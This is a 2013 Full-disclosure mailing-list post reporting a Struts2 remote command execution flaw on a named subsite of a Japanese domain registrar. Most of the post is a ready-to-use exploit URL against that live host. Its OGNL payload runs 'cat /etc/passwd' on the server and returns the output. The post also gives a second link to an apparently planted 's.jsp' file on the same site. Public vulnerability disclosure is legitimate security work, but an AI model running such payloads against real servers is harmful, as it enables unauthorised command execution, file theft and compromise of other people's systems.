[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[Full-disclosure] Japan's largest domain name registrar a subsite remote command execution
- To: full-disclosure@xxxxxxxxxxxxxxxxx
- Subject: [Full-disclosure] Japan's largest domain name registrar a subsite remote command execution
- From: you help <help.en@xxxxxxxxxx>
- Date: Sun, 13 Oct 2013 21:51:29 +0800
*Abstract:*
Japan's largest domain name registrar a subsite remote command execution
Details:
Apache struts2 a vulnerability introduced by manipulating parameters
prefixed with "action:"/"redirect:"/"redirectAction:" allows remote command
execution。
URL:
http://dom.onamae.com/biglobe-ddns/detail.do
*Proofs of concept:*
http://dom.onamae.com/biglobe-ddns/detail.do?redirect:${%23s%3dnew%20java.util.ArrayList(),%23x%3dnew%20java.lang.String(%22cat%22),%23xx%3dnew%20java.lang.String(%22/etc/passwd%22),%23s.add(%23x),%23s.add(%23xx),%23a%3dnew%20java.lang.ProcessBuilder(%23s).start().getInputStream(),%23b%3dnew%20java.io.InputStreamReader(%23a),%23c%3dnew%20java.io.BufferedReader(%23b),%23d%3dnew%20char[51020],%23c.read(%23d),%23dddddd%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse').getWriter(),%23dddddd.println(%23d),%23dddddd.close()}
http://dom.onamae.com/biglobe-ddns/s.jsp
_______________________________________________
Form: http://en.wooyun.org/bugs/wooyun-2013-011
Author: Finger <http://en.wooyun.org/whitehats/Finger>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/